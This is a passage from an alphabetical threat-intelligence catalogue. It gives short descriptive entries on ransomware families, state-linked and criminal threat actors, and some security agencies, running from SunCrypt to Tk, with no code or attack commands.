SunCrypt ransomware was discovered in October 2019 and in August 2020 it was added to Maze ransomware’s cartel. It also follows some of Maze’s tactics, techniques, and procedures. SunCrypt is launched and installed using an obfuscated PowerShell script. Infected email attachments (macros), torrent websites, malicious ads act as carriers for this ransomware.
Sundawn
Sundawn is an active extortion or ransomware group tracked by RansomLook.
Sunglow Blizzard
DEV-0665 is a threat actor associated with the HermeticWiper attacks. Their objective is to disrupt, degrade, and destroy specific resources within a targeted country.
SuperB
ransomware
Superblack
Superblack is an active extortion or ransomware group tracked by RansomLook.
SuperCrypt
ransomware
SureRansom Ransomeware (Fake)
It’s directed to English speaking users, therefore is able to strike worldwide. This ransomware does not really encrypt your files. Ransom requested is £50 using credit card.
Suri
ransomware
Surprise
Ransomware Based on EDA2
Survey
Ransomware Still in development, shows FileIce survey
Swan Vector
Seqrite Labs APT-Team has recently uncovered a campaign which we have termed as Swan Vector, that has been targeting the nations across the East China sea such as Taiwan and Japan. The campaign is aimed at educational institutes and mechanical engineering industry with lures aiming to deliver fake resume of candidates which acts as a decoy.
Swedish Security Service
Swedish Security Service – Säkerhetspolisen (Säpo)
SWEED
Cisco Talos recently identified a large number of ongoing malware distribution campaigns linked to a threat actor we're calling "SWEED," including such notable malware as Formbook, Lokibot and Agent Tesla. Based on our research, SWEED — which has been operating since at least 2017 — primarily targets their victims with stealers and remote access trojans. SWEED remains consistent across most of their campaigns in their use of spear-phishing emails with malicious attachments. While these campaigns have featured a myriad of different types of malicious documents, the actor primarily tries to infect its victims with a packed version of Agent Tesla — an information stealer that's been around since at least 2014. The version of Agent Tesla that SWEED is using differs slightly from what we've seen in the past in the way that it is packed, as well as how it infects the system. In this post, we'll run down each campaign we're able to connect to SWEED, and talk about some of the actor's tactics, techniques and procedures (TTPs).
SweetSpecter
SweetSpecter is a suspected Chinese espionage actor that has gained notoriety for using publicly available artificial intelligence capabilities to support its reconnaissance, research, and development efforts.[[OpenAI CTI Update October 2024](/references/81f40284-12e5-4835-8c14-19fb894e4822)]
Swiss intelligence agencies
Federal Intelligence Service - Nachrichtendienst des Bundes (NDB)
SYLHET GANG-SG
SYLHET GANG-SG is a hacktivist group that has targeted critical infrastructure and various entities, including the Central European University and the EU Parliament, often articulating their rationale for attacks. They have been involved in DDoS attacks against Western targets, including the personal website of UK Prime Minister Sunak and the Cyprus police. The group has also declared allegiance to the KillNet 2.0 hacker collective, focusing on threats against allies of Israel.
Symbiom
ransomware
SymmyWare
ransomware
SynAck
The ransomware does not use a customized desktop wallpaper to signal its presence, and the only way to discover that SynAck has infected your PC is by the ransom notes dropped on the user's desktop, named in the format: RESTORE_INFO-[id].txt. For example: RESTORE_INFO-4ABFA0EF.txt In addition, SynAck also appends its own extension at the end of all files it encrypted. This file extensions format is ten random alpha characters for each file. For example: test.jpg.XbMiJQiuoh. Experts believe the group behind SynAck uses RDP brute-force attacks to access remote computers and manually download and install the ransomware.
Synapse
Synapse is an active extortion or ransomware group tracked by RansomLook.
SyncCrypt
A new ransomware called SyncCrypt was discovered by Emsisoft security researcher xXToffeeXx that is being distributed by spam attachments containing WSF files. When installed these attachments will encrypt a computer and append the .kk extension to encrypted files.
SynoLocker
Ransomware Exploited Synology NAS firmware directly over WAN
Syrk
ransomware
SYSDOWN
ransomware
SystemCrypter
ransomware
SZ40
ransomware
SZFLocker
Ransomware
T1Happy
ransomware
TA2101
Proofpoint researchers detected campaigns from a relatively new actor, tracked internally as TA2101, targeting German companies and organizations to deliver and install backdoor malware. The actor initiated their campaigns impersonating the Bundeszentralamt fur Steuern, the German Federal Ministry of Finance, with lookalike domains, verbiage, and stolen branding in the emails. For their campaigns in Germany, the actor chose Cobalt Strike, a commercially licensed software tool that is generally used for penetration testing and emulates the type of backdoor framework used by Metasploit, a similar penetration testing tool. Proofpoint researchers have also observed this actor distributing Maze ransomware, employing similar social engineering techniques to those it uses for Cobalt Strike, while also targeting organizations in Italy and impersonating the Agenzia Delle Entrate, the Italian Revenue Agency. We have also recently observed the actor targeting organizations in the United States using the IcedID banking Trojan while impersonating the United States Postal Service (USPS).
TA2536
TA2536, which has been active since at least 2015, is likely Nigerian based on its unique linguistic style, tactics and tools. It uses keyloggers such as HawkEye and distinctive stylometric features in typo-squatted domains that resemble legitimate names and the use of recurring names and substrings in email addresses.
TA2552
Since January 2020, Proofpoint researchers have tracked an actor abusing Microsoft Office 365 (O365) third-party application (3PA) access, with suspected activity dating back to August 2019. The actor, known as TA2552, uses well-crafted Spanish language lures that leverage a narrow range of themes and brands. The lures entice users to click a link in the message, taking them to the legitimate Microsoft third-party apps consent page. There they are prompted to grant a third-party application read-only user permissions to their O365 account via OAuth2 or other token-based authorization methods. TA2552 seeks access to specific account resources like the user’s contacts and mail. Requesting read-only permissions for such account resources could be used to conduct account reconnaissance, silently steal data, or to intercept password reset messages from other accounts such as those at financial institutions. While organizations with global presence have received messages from this group, they appear to choose recipients who are likely Spanish speakers.
TA2719
In late March 2020, Proofpoint researchers began tracking a new actor with a penchant for using NanoCore and later AsyncRAT, popular commodity remote access trojans (RATs). Dubbed TA2719 by Proofpoint, the actor uses localized lures with colorful images that impersonate local banks, law enforcement, and shipping services. Proofpoint has observed this actor send low volume campaigns to recipients in Austria, Chile, Greece, Hungary, Italy, North Macedonia, Netherlands, Spain, Sweden, Taiwan, United States, and Uruguay.
TA2722
TA2722 is a highly active threat actor that targets various industries including Shipping/Logistics, Manufacturing, Business Services, Pharmaceutical, and Energy. They primarily focus on organizations in North America, Europe, and Southeast Asia. This threat actor impersonates Philippine government entities and uses themes related to the government to gain remote access to target computers. Their objectives include information gathering, installing follow-on malware, and engaging in business email compromise activities.
TA2723
TA2723 is a financially-motivated, high-volume credential phishing threat actor known for spoofing Microsoft OneDrive, LinkedIn, and DocuSign. Proofpoint Threat Research has observed TA2723 conducting OAuth device code phishing campaigns, utilizing tools like Squarephish and Graphish to enhance their operations. The use of these tools allows TA2723 to mitigate the short-lived nature of device codes, facilitating larger campaigns. Successful attacks can lead to M365 account takeover, data exfiltration, and lateral movement.
TA2725
TA2725 is a threat actor that has been tracked since March 2022. They primarily target organizations in Brazil and Mexico using Brazilian banking malware and phishing techniques. Recently, they have expanded their operations to also target victims in Spain and Mexico simultaneously. TA2725 typically uses GoDaddy virtual hosting for their URL redirector and hosts malicious files on legitimate cloud hosting providers like Amazon AWS, Google Cloud, or Microsoft Azure. They have been known to spoof legitimate companies, such as ÉSECÈ Group, to deceive their victims.
TA402
TA402 is an APT group that has been tracked by Proofpoint since 2020. They primarily target government entities in the Middle East and North Africa, with a focus on intelligence collection. TA402 is known for using sophisticated phishing campaigns and constantly updating their malware implants and delivery methods to evade detection. They have been observed using cloud services like Dropbox and Google Drive for hosting malicious payloads and command-and-control infrastructure.
TA406
TA406 is engaging in malware distribution, phishing, intelligence collection, and cryptocurrency theft, resulting in a wide range of criminal activities.
TA410
Early in August 2019, Proofpoint described what appeared to be state-sponsored activity targeting the US utilities sector with malware that we dubbed “Lookback”. Between August 21 and August 29, 2019, several spear phishing emails were identified targeting additional US companies in the utilities sector. The phishing emails originated from what appears to be an actor-controlled domain: globalenergycertification[.]net. This domain, like those used in previous campaigns, impersonated a licensing body related to the utilities sector. In this case, it masqueraded as the legitimate domain for Global Energy Certification (“GEC”). The emails include a GEC examination-themed body and a malicious Microsoft Word attachment that uses macros to install and run LookBack. (Note confusion between Malware, Campaign and ThreatActor)
TA428
Proofpoint researchers have identified a targeted APT campaign that utilized malicious RTF documents to deliver custom malware to unsuspecting victims. We dubbed this campaign “Operation LagTime IT” based on entities that were targeted and the distinctive domains registered to C&C IP infrastructure. Beginning in early 2019, these threat actors targeted a number of government agencies in East Asia overseeing government information technology, domestic affairs, foreign affairs, economic development, and political processes. We determined that the infection vector observed in this campaign was spear phishing, with emails originating from both free email accounts and compromised user accounts. Attackers relied on Microsoft Equation Editor exploit CVE-2018-0798 to deliver a custom malware that Proofpoint researchers have dubbed Cotx RAT. Additionally, this APT group utilizes Poison Ivy payloads that share overlapping command and control (C&C) infrastructure with the newly identified Cotx campaigns. Based on infrastructure overlaps, post-exploitation techniques, and historic TTPs utilized in this operation, Proofpoint analysts attribute this activity to the Chinese APT group tracked internally as TA428. Researchers believe that this activity has an operational and tactical resemblance to the Maudi Surveillance Operation which was previously reported in 2013.
TA444
TA444 is a North Korea state-sponsored threat actor that primarily focuses on financially motivated operations. They have been active since at least 2017 and have recently shifted their attention to targeting cryptocurrencies. TA444 employs various infection methods and has a diverse range of malware and backdoors at their disposal. They have been attributed to stealing hundreds of millions of dollars' worth of cryptocurrency and related assets.
TA453
TA453 has employed the use of compromised accounts, malware, and confrontational lures to go after targets with a range of backgrounds from medical researchers to realtors to travel agencies.
TA455
TA455 is an Iranian APT group targeting the aerospace industry through a campaign known as the “Iranian Dream Job Campaign,” utilizing deceptive job offers to lure victims. They employ spearphishing tactics with malicious ZIP files containing the executable “secur32[.]dll” and disguise their C2 communications within the traffic of reputable services like Cloudflare and GitHub. The group intentionally mimics the TTPs of the North Korean Lazarus group to mislead investigators and complicate attribution. Their multi-stage infection strategy enhances the likelihood of success while evading detection.
TA482
Since early 2022, Proofpoint researchers have observed a prolific threat actor, tracked as TA482, regularly engaging in credential harvesting campaigns that target the social media accounts of mostly US-based journalists and media organizations. This victimology, TA482’s use of services originating from Turkey to host its domains and infrastructure, as well as Turkey’s history of leveraging social media to spread pro-President Recep Tayyip Erdogan and pro-Justice and Development Party (Turkey’s ruling party) propaganda support Proofpoint’s assessment that TA482 is aligned with the Turkish state.
TA4903
TA4903 is a financially motivated threat actor known for conducting credential phishing and business email compromise campaigns. They target organizations in the U.S. across various sectors, spoofing government entities and private businesses. The actor has been observed using techniques such as QR codes in phishing campaigns and spoofing supplier domains to prompt victims to provide banking information. TA4903's activities typically involve stealing corporate credentials to facilitate follow-on BEC activities.
TA499
TA499, also known as Vovan and Lexus, is a Russia-aligned threat actor that has aggressively engaged in email campaigns since at least 2021. The threat actor’s campaigns attempt to convince high-profile North American and European government officials as well as CEOs of prominent companies and celebrities into participating in recorded phone calls or video chats.
TA505
TA505, the name given by Proofpoint, has been in the cybercrime business for at least four years. This is the group behind the infamous Dridex banking trojan and Locky ransomware, delivered through malicious email campaigns via Necurs botnet. Other malware associated with TA505 include Philadelphia and GlobeImposter ransomware families.
TA516
This actor typically distributes instances of the SmokeLoader intermediate downloader, which, in turn, downloads additional malware of the actor’s choice -- often banking Trojans. Figure 3 shows a lure document from a November campaign in which TA516 distributed fake resumes with malicious macros that, if enabled, launch a PowerShell script that downloads SmokeLoader. In this instance, we observed SmokeLoader downloading a Monero coinminer. Since the middle of 2017, TA516 has used similar macro-laden documents as well as malicious JavaScript hosted on Google Drive to distribute both Panda Banker and a coinminer executable via SmokeLoader, often in the same campaigns.
TA530
TA530, who we previously examined in relation to large-scale personalized phishing campaigns
TA547
TA547 is responsible for many other campaigns since at least November 2017. The other campaigns by the actor were often localized to countries such as Australia, Germany, the United Kingdom, and Italy. Delivered malware included ZLoader (a.k.a. Terdot), Gootkit, Ursnif, Corebot, Panda Banker, Atmos, Mazar Bot, and Red Alert Android malware.
TA554
Since May 2018, Proofpoint researchers have observed email campaigns using a new downloader called sLoad. sLoad is a PowerShell downloader that most frequently delivers Ramnit banker and includes noteworthy reconnaissance features. The malware gathers information about the infected system including a list of running processes, the presence of Outlook, and the presence of Citrix-related files. sLoad can also take screenshots and check the DNS cache for specific domains (e.g., targeted banks), as well as load external binaries. While initial versions of sLoad appeared in May 2018, we began tracking the campaigns from this actor (internally named TA554) since at least the beginning of 2017.
TA555
Beginning in May 2018, Proofpoint researchers observed a previously undocumented downloader dubbed AdvisorsBot appearing in malicious email campaigns. The campaigns appear to primarily target hotels, restaurants, and telecommunications, and are distributed by an actor we track as TA555. To date, we have observed AdvisorsBot used as a first-stage payload, loading a fingerprinting module that, as with Marap, is presumably used to identify targets of interest to further infect with additional modules or payloads. AdvisorsBot is under active development and we have also observed another version of the malware completely rewritten in PowerShell and .NET.
TA558
Since 2018, security researchers tracked a financially-motivated cybercrime actor, TA558, targeting hospitality, travel, and related industries located in Latin America and sometimes North America, and western Europe. The actor sends malicious emails written in Portuguese, Spanish, and sometimes English. The emails use reservation-themed lures with business-relevant themes such as hotel room bookings. The emails may contain malicious attachments or URLs aiming to distribute one of at least 15 different malware payloads.
TA570
One of the most active Qbot malware affiliates, Proofpoint has tracked the large cybercrime threat actor TA570 since 2018.
TA571
TA571 is a spam distributor actor known for delivering a variety of malware, including DarkGate, NetSupport RAT, and information stealers. They use phishing emails with macro-enabled attachments to spread malicious PDFs containing rogue OneDrive links. TA571 has been observed using unique filtering techniques with intermediary "gates" to target specific users and bypass automated sandboxing. Proofpoint assesses with high confidence that TA571 infections can lead to ransomware.
TA575
TA575 is a Dridex affiliate tracked by Proofpoint since late 2020. This group distributes malware such as Dridex, Qakbot, and WastedLocker via malicious URLs, Office attachments, and password-protected files. On average, TA575 distributes almost 4,000 messages per campaign impacting hundreds of organizations.
TA579
TA579, a threat actor that Proofpoint researchers have been tracking since August 2021. This actor frequently delivered BazaLoader and IcedID in past campaigns.
TA584
TA584 is a prominent initial access broker tracked by Proofpoint since November 2020, known for its high-volume campaigns targeting organizations globally. The actor employs various TTPs, including macro-enabled Excel documents, aggressive URL filtering, and geo-fenced landing pages, while frequently changing lures and delivery methods to evade detection. In 2025, TA584 expanded its geographic targeting to include Germany and Australia, while also introducing new malware such as Tsundere Bot alongside XWorm with the "P0WER" configuration. The actor's campaigns are characterized by rapid turnover and deliberate variability, making static indicators less effective for detection.
TA800
This attacker is an affiliate distributor of the The Trick, also known as Trickbot, and BazaLoader. (For more on how affiliates work, see the description of TA573). TA800 has targeted a wide range of industries in North America, infecting victims with banking Trojans and malware loaders (malware designed to download other malware onto a compromised device). Malicious emails have often included recipients’ names, titles and employers along with phishing pages designed to look like the targeted company. Lures have included hard-to-resist subjects such as related to payment, meetings, termination, bonuses and complaints in the subject line or body of the email.
TA829
TA829 is a Russia-aligned threat actor that employs the RomCom RAT for intelligence-gathering and financially motivated cyberattacks, exploiting zero-day vulnerabilities in Mozilla Firefox and Microsoft Windows. The group utilizes REM Proxy services hosted on compromised MikroTik routers to relay traffic and disguise its origin. In their operations, victims targeted by TA829 receive a strain known as SlipScreen, while their infrastructure and tactics show significant similarities to those of UNK_GreenSec. TA829's hybrid approach combines espionage with financial fraud, making it a notable player in the cyber threat landscape.
TA866
According to Proofpoint, TA866 is a newly identified threat actor that distributes malware via email utilizing both commodity and custom tools. While most of the activity observed occurred since October 2022, Proofpoint researchers identified multiple activity clusters since 2019 that overlap with TA866 activity. Most of the activity recently observed by Proofpoint suggests recent campaigns are financially motivated, however assessment of historic related activities suggests a possible, additional espionage objective.
TAG-112
TAG-112 is a Chinese state-sponsored APT that compromised Tibetan websites, including Tibet Post and Gyudmed Tantric University, to deliver Cobalt Strike malware. The group exploited vulnerabilities in the Joomla CMS to embed malicious JavaScript that spoofed a TLS certificate error, tricking users into downloading a compromised security certificate. TAG-112's infrastructure, concealed using Cloudflare, shows notable overlap with TAG-102, but it employs less sophisticated tactics, relying on Cobalt Strike rather than custom malware. The campaign reflects ongoing cyber-espionage efforts targeting Tibetan entities, likely for information collection and surveillance.
TAG-124
TAG-124 is a threat actor that employs a traffic distribution system to distribute malware, primarily using MintsLoader and targeting various sectors through phishing emails and compromised websites. The actor injects malicious JavaScript into WordPress sites, leading victims to fake Google Chrome update landing pages that facilitate malware downloads, often masquerading as legitimate updates. TAG-124 has been linked to multiple ransomware groups, including Rhysida and Interlock, and demonstrates high activity levels by regularly updating its infrastructure and refining its infection tactics, such as the ClickFix technique. Notable compromised sites include those associated with the Polish Centre for Testing and Certification and the Economic Community of West African States (ECOWAS).
TAG-140
TAG-140 is a threat actor group that primarily targets Indian government entities, employing cyber espionage tactics such as phishing and malware campaigns. They have deployed a new variant of the DRAT RAT, known as DRAT V2, which utilizes a ClickFix lure and executes a remote script via mshta.exe to establish persistence and facilitate data exfiltration. Their operations include the use of the BroaderAspect loader and a custom TCP-based C2 protocol, enabling a range of post-exploitation activities. TAG-140's activities reflect a pattern of iterative advancement in their malware arsenal and delivery techniques, complicating detection and attribution efforts.
TAG-28
TAG-28 is a Chinese state-sponsored threat actor that has been targeting Indian organizations, including media conglomerates and government agencies. They have been using the Winnti malware, which is commonly shared among Chinese state-sponsored groups. TAG-28's main objective is to gather intelligence on Indian targets, potentially for espionage purposes.
TAG-56
TAG-56 is a threat actor group that shares similarities with the APT42 group. They use tactics such as fake registration pages and spearphishing to target victims, often using encrypted chat platforms like WhatsApp or Telegram. TAG-56 is believed to be part of a broader campaign led by an Iran-nexus threat activity group. They have been observed using shared web hosts and recycled code, indicating a preference for acquiring purpose-built infrastructure rather than establishing their own.
Taidoor
The Taidoor attackers have been actively engaging in targeted attacks since at least March 4, 2009. Despite some exceptions, the Taidoor campaign often used Taiwanese IP addresses as C&C servers and email addresses to send out socially engineered emails with malware as attachments. One of the primary targets of the Taidoor campaign appeared to be the Taiwanese government. The attackers spoofed Taiwanese government email addresses to send out socially engineered emails in the Chinese language that typically leveraged Taiwan-themed issues. The attackers actively sent out malicious documents and maintained several IP addresses for command and control. As part of their social engineering ploy, the Taidoor attackers attach a decoy document to their emails that, when opened, displays the contents of a legitimate document but executes a malicious payload in the background. We were only able to gather a limited amount of information regarding the Taidoor attackers’ activities after they have compromised a target. We did, however, find that the Taidoor malware allowed attackers to operate an interactive shell on compromised computers and to upload and download files. In order to determine the operational capabilities of the attackers behind the Taidoor campaign, we monitored a compromised honeypot. The attackers issued out some basic commands in an attempt to map out the extent of the network compromise but quickly realized that the honeypot was not an intended targeted and so promptly disabled the Taidoor malware running on it. This indicated that while Taidoor malware were more widely distributed compared with those tied to other targeted campaigns, the attackers could quickly assess their targets and distinguish these from inadvertently compromised computers and honeypots.
Takahiro Locker
ransomware
Tanzania Intelligence and Security Service
Tanzania Intelligence and Security Service (TISS)
Targetcompany
Targetcompany is an active extortion or ransomware group tracked by RansomLook.
Taronis
Taronis is an active extortion or ransomware group tracked by RansomLook.
TaskMasters
TaskMasters is a state-sponsored Chinese APT that has been active since at least 2010, primarily targeting industrial, energy, and government sectors in Russia and the CIS. The group has been linked to the Webdav-O Trojan, which employs techniques to bypass network defenses by connecting to legitimate services. Investigations suggest that TaskMasters may have been involved in attacks against Russian federal executive authorities in 2020, potentially alongside another Chinese group, TA428. Additionally, the group has been associated with the BackDoor.RemShell.24 malware, indicating a diverse toolkit in their operations.
TBHRanso
ransomware
Team Criminal Intelligence (FIOD-TCI)
Team Criminal Intelligence (FIOD-TCI)
Team Criminal Intelligence (KMar-TCI)
Team Criminal Intelligence (KMar-TCI)
Team Underground
Team Underground is an active extortion or ransomware group tracked by RansomLook.
Team-Xecuter
Team-Xecuter is a hacking group led by Gary Bowser, also known as GaryOPA. They were involved in a piracy conspiracy against Nintendo, creating and selling illegal circumvention devices that allowed users to hack video game consoles for playing pirated games. Gary Bowser has admitted his participation in this activity and is facing legal consequences.
Team46
Team46 is a sophisticated APT group active since at least late 2024, targeting Russian government, academic, and media organizations through spearphishing emails disguised as forum invitations or service notifications. They exploit zero-day vulnerabilities like CVE-2025-2783 in Google Chrome (March 2025, Operation ForumTroll) and CVE-2024-6473 in Yandex Browser, deploying multi-stage loaders (e.g., winsta.dll, donut shellcode) that decrypt payloads using machine-specific keys like firmware UUID for environmental guardrails. Key malware includes the Trinper backdoor for keylogging, clipboard theft, file/process discovery, and encrypted C2 exfiltration over HTTPS with domain fronting, alongside auxiliary .NET tools (dirlist.exe, ProcessList.exe) and variants using Cobalt Strike or Dante backdoor; the group employs obfuscation, AMSI bypasses, debugger evasion, and self-deletion for persistence and stealth. Positive Technologies attributes TaxOff operations to Team46 based on identical PowerShell patterns, loaders, and hyphenated CDN-mimicking infrastructure (e.g., ms-appdata-*.global.ssl.fastly.net).
Teamo
ransomware
TeamPCP
TeamPCP is a threat actor that has executed a coordinated series of supply chain attacks, compromising widely-used open source tools such as Trivy, KICS, and LiteLLM to deploy credential-stealing malware. They employed techniques like credential harvesting, lateral movement within Kubernetes environments, and audio steganography to evade detection. The group has demonstrated the ability to leverage stolen credentials to propagate attacks across multiple ecosystems, including npm and PyPI, using a self-propagating worm known as CanisterWorm. Their operations have included the use of AES-256 encryption and RSA-4096 for exfiltration of sensitive data.
TeamSpy Crew
Researchers have uncovered a long-term cyber-espionage campaign that used a combination of legitimate software packages and commodity malware tools to target a variety of heavy industry, government intelligence agencies and political activists. Known as the TeamSpy crew because of its affinity for using the legitimate TeamViewer application as part of its toolset, the attackers may have been active for as long as 10 years, researchers say. The attack appears to be a years-long espionage campaign, but experts who have analyzed the victim profile, malware components and command-and-control infrastructure say that it’s not entirely clear what kind of data the attackers are going after. What is clear, though, is that the attackers have been at this for a long time and that they have specific people in mind as targets. Researchers at the CrySyS Lab in Hungary were alerted by the Hungarian National Security Authority to an attack against a high-profile target in the country and began looking into the campaign. They quickly discovered that some of the infrastructure being used in the attack had been in use for some time and that the target they were investigating was by no means the only one.
TeamXRat
Ransomware
Teamxxx
Teamxxx is an active extortion or ransomware group tracked by RansomLook.
Tear Dr0p
ransomware
TechandStrat
ransomware
Technicy
ransomware
Teleboyi
Teleboyi is a threat actor reportedly based in China, associated with the PlugX RAT. TeamT5 identified a custom PlugX loader used by Teleboyi that employs a similar string decryption algorithm as seen in the McUtil.dll loader from Operation Harvest. While there are weak links to the dsqurey[.]com domain, the connection remains uncertain due to the domain's registration history.
Telecrypt Ransomware
This is most likely to affect Russian speaking users, since the note is written in Russian. Therefore, residents of Russian speaking country are affected. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. The ransomware’s authors would request around $75 from their victims to provide them with a decryptor (payments are accepted via Russian payment services Qiwi or Yandex.Money ). Right from the start, however, researchers suggested that TeleCrypt was written by cybercriminals without advanced skills. Telecrypt will generate a random string to encrypt with that is between 10-20 length and only contain the letters vo,pr,bm,xu,zt,dq.
Telegram
Telegram is an active extortion or ransomware group tracked by RansomLook.
Tellyouthepass
Tellyouthepass is a ransomware that alters system files, registry entries and encodes personal photos, documents, and servers or archives. Army-grade encryption algorithms get used to change the original code of the file and make the data useless.
TEMP_Heretic
TEMP_Heretic is a threat actor that has been observed engaging in targeted spear-phishing campaigns. They exploit vulnerabilities in email platforms, such as Zimbra, to exfiltrate emails from government, military, and media organizations. They use multiple outlook.com email addresses and manually craft content for each email before sending it.
TEMP.Hermit
TEMP.Hermit is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
TEMPER PANDA
China-based cyber threat group. It has previously used newsworthy events as lures to deliver malware and has primarily targeted organizations involved in financial, economic, and trade policy, typically using publicly available RATs such as PoisonIvy, as well as some non-public backdoors. This threat actor targets prodemocratic activists and organizations in Hong Kong, European and international financial institutions, and a U.S.-based think tank.
TempTick
This threat actor targets organizations in the finance, defense, aerospace, technology, health-care, and automotive sectors and media organizations in East Asia for the purpose of espionage. Believed to be responsible for the targeting of South Korean actors prior to the meeting of Donald J. Trump and Kim Jong-un
Tengu
Tengu is an active extortion or ransomware group tracked by RansomLook.
Terörle Mücadele Dairesi Başkanlığı(TEM) (page does not exist)
Terörle Mücadele Dairesi Başkanlığı(TEM) (Anti-Terrorism Department)
TERBIUM
Microsoft Threat Intelligence identified similarities between this recent attack and previous 2012 attacks against tens of thousands of computers belonging to organizations in the energy sector. Microsoft Threat Intelligence refers to the activity group behind these attacks as TERBIUM, following our internal practice of assigning rogue actors chemical element names.
Termite Ransomware Operators
The Termite ransomware strain has been observed since April 2024. Researchers have noted considerable code and behavioral overlaps between the Babuk ransomware and Termite.[[Infosecurity Magazine December 9 2024](/references/1a3f22b7-8585-44b7-845a-eaa13d8a5dc1)] Actors using Termite have attacked organizations in various sectors and locations, publicly extorting some victims on a dark web "data leak" site since November 2024.[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)] News reports linked a series of attacks in late 2024, which exploited vulnerabilities in Cleo managed file transfer ("MFT") software, to Termite ransomware operators.[[DarkReading Termite Cleo December 10 2024](/references/e854ae37-3137-4cdd-a464-7e2328b1246e)]
Termite Ransomware
Ben Hunter discovered a new ransomware called Termite Ransomware. When encrypting a computer it will append the .aaaaaa extension to encrypted files.
Termite
Termite is an active extortion or ransomware group tracked by RansomLook.
Terrorelhárítási Központ
Terrorelhárítási Központ (TEK) (Counter Terrorism Centre)
Terrorist Investigation Division
Terrorist Investigation Division
TeslaCrypt 0.x - 2.2.0
Ransomware Factorization
TeslaCrypt 3.0+
Ransomware 4.0+ has no extension
TeslaCrypt 4.1A
Ransomware
TeslaCrypt 4.2
Ransomware
TeslaWare
ransomware
TEST PANDA
TEST PANDA is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
TetrisPhantom
TetrisPhantom relies on compromising of certain type of secure USB drives that provide hardware encryption and is commonly used by government organizations. While investigating this threat, experts identified an entire spying campaign that uses a range of malicious modules to execute commands, collect files and information from compromised computers and transfer them to other machines also using secure USB drives.
TFlower
ransomware
Thanatos
first ransomware seen to ask for payment to be made in Bitcoin Cash (BCH)
Thanksgiving Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..
Thanos
Thanos is an active extortion or ransomware group tracked by RansomLook.
The Big Bang
While it is not clear exactly what the attacker is looking for, what is clear is that once he finds it, a second stage of the attack awaits, fetching additional modules and/or malware from the Command and Control server. This then is a surveillance attack in progress and has been dubbed ‘Big Bang’ due to the attacker’s fondness for the ‘Big Bang Theory’ TV show, after which some of the malware’s modules are named.
The Brotherhood
ransomware
The Gentlemen
The Gentlemen is a ransomware group that employs a dual-extortion strategy, encrypting sensitive files while exfiltrating critical business data to pressure victims into paying ransoms. Their operations leverage advanced techniques such as abusing legitimate utilities like PowerRun.exe for privilege escalation, using custom-built tools for defense evasion, and employing flexible encryption methods based on file size. The group targets medium to large organizations across various sectors, particularly in the Asia-Pacific region, and has demonstrated a high level of technical maturity and operational discipline. Their activities include systematic compromise of enterprise environments, mass account enumeration, and the use of encrypted channels for data exfiltration.
The Gorgon Group
Unit 42 researchers have been tracking Subaat, an attacker, since 2017. Recently Subaat drew our attention due to renewed targeted attack activity. Part of monitoring Subaat included realizing the actor was possibly part of a larger crew of individuals responsible for carrying out targeted attacks against worldwide governmental organizations. Technical analysis on some of the attacks as well as attribution links with Pakistan actors have been already depicted by 360 and Tuisec, in which they found interesting connections to a larger group of attackers Unit 42 researchers have been tracking, which we are calling Gorgon Group.
The Green Blood Group
The Green Blood Group is an active extortion or ransomware group tracked by RansomLook.
The Information Branch
The Information Branch
The Magic
ransomware
The National Cyber Security Commission[25] (NCSC) – الهيئة الوطنية للأمن السيبراني
The National Cyber Security Commission[25] (NCSC) – الهيئة الوطنية للأمن السيبراني
The Shadow Brokers
The Shadow Brokers (TSB) is a hacker group who first appeared in the summer of 2016. They published several leaks containing hacking tools from the National Security Agency (NSA, including several zero-day exploits.[1] Specifically, these exploits and vulnerabilities targeted enterprise firewalls, antivirus software, and Microsoft products. The Shadow Brokers originally attributed the leaks to the Equation Group threat actor, who have been tied to the NSA's Tailored Access Operations unit.
TheCursedMurderer
ransomware
TheDarkEncryptor
ransomware
TheDarkOverlord
The Dark Overlord is a financially motivated ransomware group that has been active since 2016. The group is known for targeting large organizations, including Netflix, ABC, and Miramax.
TheWizards
TheWizards is a China-aligned APT group that employs the Spellbinder tool for adversary-in-the-middle attacks, utilizing IPv6 SLAAC spoofing to redirect legitimate software updates to malicious servers. They have developed the WizardNet backdoor for Windows and serve DarkNights to Android applications, indicating a connection to Dianke Network Security Technology. The group targets individuals and companies in the Philippines, Cambodia, the UAE, mainland China, and Hong Kong. ESET has observed their infrastructure and tools, including the acquisition of servers for hosting C&C and malicious updates.
Thor
ransomware
Threat Actor 888
Threat actor 888 is a hacker active in 2024, targeting companies for data breaches. They've hit Microsoft, BMW (Hong Kong), and others in tech, freight, and oil & gas industries
Threat Finder
Ransomware Files cannot be decrypted Has a GUI
Threatmarket
Threatmarket is an active extortion or ransomware group tracked by RansomLook.
Threatsec
ThreatSec is a hacktivist group that has targeted various organizations, including internet service providers in Gaza. They claim to fight for the rights and freedom of the oppressed and do not prioritize monetary gain. The group is part of the "Five Families" consortium, which includes other hacktivist groups such as GhostSec and Stormous. ThreatSec has been involved in cyberattacks, data breaches, and ransomware activities.
THT
ransomware
ThunderCrypt
ransomware
ThunderX
ransomware
TianWu
TianWu is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
Tick
Tick is a cyber espionage group with likely Chinese origins that has been active since at least 2008. The group appears to have close ties to the Chinese National University of Defense and Technology, which is possibly linked to the PLA. This threat actor targets organizations in the critical infrastructure, heavy industry, manufacturing, and international relations sectors for espionage purposes. The attacks appear to be centered on political, media, and engineering sectors. STALKER PANDA has been observed conducting targeted attacks against Japan, Taiwan, Hong Kong, and the United States.
TIDRONE
TIDRONE is an unidentified threat actor linked to Chinese-speaking groups, with a focus on military-related industry chains, particularly drone manufacturers in Taiwan. The actor employs advanced malware variants such as CXCLNT and CLNTEND, which are distributed through ERP software or remote desktops. The consistency in file compilation times and operational patterns aligns with other Chinese espionage activities, indicating a likely espionage motive.
TiltedTemple
One of their notable tools is a custom backdoor called SockDetour, which operates filelessly and socketlessly on compromised Windows servers. The group's activities have been linked to the exploitation of vulnerabilities in Zoho ManageEngine ADSelfService Plus and ServiceDesk Plus.
Timc
Timc is an active extortion or ransomware group tracked by RansomLook.
TINY SPIDER
According to CrowdStrike, this actor is using TinyLoader and TinyPOS, potentially buying access through Dridex infections.
Tk
ransomware
